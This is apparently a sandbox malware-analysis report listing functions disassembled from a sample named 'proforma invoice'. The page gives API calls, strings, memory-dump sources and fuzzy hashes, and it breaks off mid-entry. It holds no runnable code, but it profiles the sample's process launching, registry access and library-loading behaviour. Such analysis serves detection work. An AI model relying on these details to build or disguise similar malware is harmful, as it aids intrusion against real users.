                  Function 00B01874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B0187F
                  • UnloadUserProfile.USERENV(?,?), ref: 00B0188B
                  • CloseHandle.KERNEL32(?), ref: 00B01894
                  • CloseHandle.KERNEL32(?), ref: 00B0189C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B018A5
                  • HeapFree.KERNEL32(00000000), ref: 00B018AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                  • String ID:
                  • API String ID: 146765662-0
                  • Opcode ID: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
                  • Instruction ID: 1c1a78e2f8e0e4f9274b4f074b83ee7d3b92c2728edcc05a29163456f2b6e241
                  • Opcode Fuzzy Hash: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
                  • Instruction Fuzzy Hash: D4E0C236004501BBDB015BE1ED0C90ABF29FB49B22B208220F225A2070CF329430EB50
                  Function 00B0C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C6EE
                  • _wcslen.LIBCMT ref: 00B0C735
                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C79C
                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B0C7CA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ItemMenu$Info_wcslen$Default
                  • String ID: 0
                  • API String ID: 1227352736-4108050209
                  • Opcode ID: f81d5aea98c061a0175a526d381a24c0918966433b668e7b2aae1b5f8cc42812
                  • Instruction ID: 2aa2e8bfed0fe14239a31c9c54fe4a1fb840b63ab2c9ba89557199a189c96963
                  • Opcode Fuzzy Hash: f81d5aea98c061a0175a526d381a24c0918966433b668e7b2aae1b5f8cc42812
                  • Instruction Fuzzy Hash: 5251BD716043009BD7259F28C985B6A7FE8EB49310F044BADF9A5E31E1DB60DD048B66
                  Function 00B2AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                  Download Yara Rule
                  APIs
                  • ShellExecuteExW.SHELL32(0000003C), ref: 00B2AEA3
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                  • GetProcessId.KERNEL32(00000000), ref: 00B2AF38
                  • CloseHandle.KERNEL32(00000000), ref: 00B2AF67
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseExecuteHandleProcessShell_wcslen
                  • String ID: <$@
                  • API String ID: 146682121-1426351568
                  • Opcode ID: 2b7ab0398e0b175fc24157688c4970f36ea11b58dfd75181819291bfd30213fa
                  • Instruction ID: a824c268e10c2daea0a5f63f8407f84a15e6813815646ee6a534b90f76acd56e
                  • Opcode Fuzzy Hash: 2b7ab0398e0b175fc24157688c4970f36ea11b58dfd75181819291bfd30213fa
                  • Instruction Fuzzy Hash: 75718B71A00625DFCB14EF54D584A9EBBF0FF09310F158499E81AAB392CB74ED45CB91
                  Function 00B0719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B07206
                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B0723C
                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B0724D
                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B072CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$AddressCreateInstanceProc
                  • String ID: DllGetClassObject
                  • API String ID: 753597075-1075368562
                  • Opcode ID: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
                  • Instruction ID: 2568dca1bdbd48fb0aaf6c728c3350373ccb359885f0d1223a0e2f45551581d0
                  • Opcode Fuzzy Hash: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
                  • Instruction Fuzzy Hash: 42416071A44204AFDB15CF54C884A9ABFE9EF45350F2580EDBD059F24ADBB0ED44DBA0
                  Function 00B33D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33E35
                  • IsMenu.USER32(?), ref: 00B33E4A
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33E92
                  • DrawMenuBar.USER32 ref: 00B33EA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Item$DrawInfoInsert
                  • String ID: 0
                  • API String ID: 3076010158-4108050209
                  • Opcode ID: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
                  • Instruction ID: d387dcb0c1aab7659aec8168301d712567ca7e3a5e61fffab4a08274eb1d3fb7
                  • Opcode Fuzzy Hash: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
                  • Instruction Fuzzy Hash: 77414875A00219EFDB10DF94D884EAABBF9FF49750F2441A9E905AB250DB30AE45CF60
                  Function 00B01DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B01E66
                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B01E79
                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B01EA9
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$_wcslen$ClassName
                  • String ID: ComboBox$ListBox
                  • API String ID: 2081771294-1403004172
                  • Opcode ID: 10ca2bf8bd27e579b7b954d4ab830165cab97e7a77ee3e4ecd07dfbc988e86f1
                  • Instruction ID: 03a4e41b4d4a0cd43d231a07d502955cede380c11378e22f7ce26e4fd66b1539
                  • Opcode Fuzzy Hash: 10ca2bf8bd27e579b7b954d4ab830165cab97e7a77ee3e4ecd07dfbc988e86f1
                  • Instruction Fuzzy Hash: A421B771A00104BFDB189BA4DD46CFFBBF9EF46354F144559F815A71E1DB3849069620
                  Function 00B2C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                  • API String ID: 176396367-4004644295
                  • Opcode ID: 123ef3a6e58e85b138dd43eeb825f20e0e296396dae9d886615cd498675b92c1
                  • Instruction ID: 2e8ffe8273a1124890c88f74d769f5c08d912c1240539a15d71df73e966cd805
                  • Opcode Fuzzy Hash: 123ef3a6e58e85b138dd43eeb825f20e0e296396dae9d886615cd498675b92c1
                  • Instruction Fuzzy Hash: 9E313633A001794BCB20DF2CE9405BF3BD1DBA3784B0540A9E85DAB24DEA71CE4097E0
                  Function 00B32F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B32F8D
                  • LoadLibraryW.KERNEL32(?), ref: 00B32F94
                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B32FA9
                  • DestroyWindow.USER32(?), ref: 00B32FB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$DestroyLibraryLoadWindow
                  • String ID: SysAnimate32
                  • API String ID: 3529120543-1011021900
                  • Opcode ID: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
                  • Instruction ID: 591929f70b62befe8ebbc598f65501c2a19042f93c8fe69a01b0efb0dcd453d2
                  • Opcode Fuzzy Hash: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
                  • Instruction Fuzzy Hash: 62218C72204205ABEB104FA4DC81EBB77FDEB59364F204658FA50E72A0DB71DC919760
                  Function 00AC4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002), ref: 00AC4D8D
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AC4DA0
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000), ref: 00AC4DC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
                  • Instruction ID: b696c9dd974dcce193b93b9a819d7a072a1b5bfa7b0e35340d2f714607be7842
                  • Opcode Fuzzy Hash: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
                  • Instruction Fuzzy Hash: 52F03C35A40208BBDB11AB90DC49FAEBFE5EF48751F1101A8E90AB2260CF745E40DB95
                  Function 00AFD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32 ref: 00AFD3AD
                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFD3BF
                  • FreeLibrary.KERNEL32(00000000), ref: 00AFD3E5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: GetSystemWow64DirectoryW$X64
                  • API String ID: 145871493-2590602151
                  • Opcode ID: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
                  • Instruction ID: 43869acb66e2e55797f1b97375e92dffb65f5e853d1181b1a4536a306daf7a4f
                  • Opcode Fuzzy Hash: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
                  • Instruction Fuzzy Hash: 8BF02032406A289BE72217908C08ABD3A66AF11B01B648284F706FA115DB30CD40A7D2
                  Function 00AA4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
                  • FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-3689287502
                  • Opcode ID: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
                  • Instruction ID: 103af36b1c969c8a6f3faf26b1be44d2b13a9ad3847cf8fc8fbdba541fff14f3
                  • Opcode Fuzzy Hash: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
                  • Instruction Fuzzy Hash: 87E0CD36A059225BD23217657C18B9F7994AFC7F63B150115FC05F3150DFE4CD0156E0
                  Function 00AA4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
                  • FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-1355242751
                  • Opcode ID: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
                  • Instruction ID: a055cf9d0303eeb6cce3254395e3e240e30b937ad9d92770c5e2a14bf63626ad
                  • Opcode Fuzzy Hash: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
                  • Instruction Fuzzy Hash: 1CD0C236502A215746321B647C18EDF7E98AFCAF113150111F905F31A0CFA0CD0192D0
                  Function 00B2A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcessId.KERNEL32 ref: 00B2A427
                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B2A435
                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B2A468
                  • CloseHandle.KERNEL32(?), ref: 00B2A63D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CloseCountersCurrentHandleOpen
                  • String ID:
                  • API String ID: 3488606520-0
                  • Opcode ID: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
                  • Instruction ID: 3e0af0f2be96942c91575899bc471b59fad0f4ed3a50b6a91ebcd505098ec123
                  • Opcode Fuzzy Hash: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
                  • Instruction Fuzzy Hash: FCA17F71604301AFE720DF24D986F2AB7E5AF84714F14885DF55A9B3D2DBB0EC418B92
                  Function 00B0E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16
                    • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                  • lstrcmpiW.KERNEL32(?,?), ref: 00B0E473
                  • MoveFileW.KERNEL32(?,?), ref: 00B0E4AC
                  • _wcslen.LIBCMT ref: 00B0E5EB
                  • _wcslen.LIBCMT ref: 00B0E603
                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B0E650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                  • String ID:
                  • API String ID: 3183298772-0
                  • Opcode ID: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
                  • Instruction ID: c911bcdcf880cc132739f93d2cbecf481410db6a19d91f2217ca4ccdd16b31c1
                  • Opcode Fuzzy Hash: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
                  • Instruction Fuzzy Hash: 67518FB24083449BC724EBA4DC81ADFB7ECEF85340F00496EF59993191EF75E6888766
                  Function 00B2B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BAA5
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BB00
                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B2BB63
                  • RegCloseKey.ADVAPI32(?,?), ref: 00B2BBA6
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2BBB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                  • String ID:
                  • API String ID: 826366716-0
                  • Opcode ID: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
                  • Instruction ID: c7e114d2efdbe20e5973ad91a9e670bde9f0b22da481a263809e5190756ef8cc
                  • Opcode Fuzzy Hash: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
                  • Instruction Fuzzy Hash: 5E61B031208241AFD714DF14D494E2ABBE5FF85348F1489ACF49A8B2A2DF31ED45CB92
                  Function 00B08BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00B08BCD
                  • VariantClear.OLEAUT32 ref: 00B08C3E
                  • VariantClear.OLEAUT32 ref: 00B08C9D
                  • VariantClear.OLEAUT32(?), ref: 00B08D10
                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B08D3B
                  Memory Dump Source
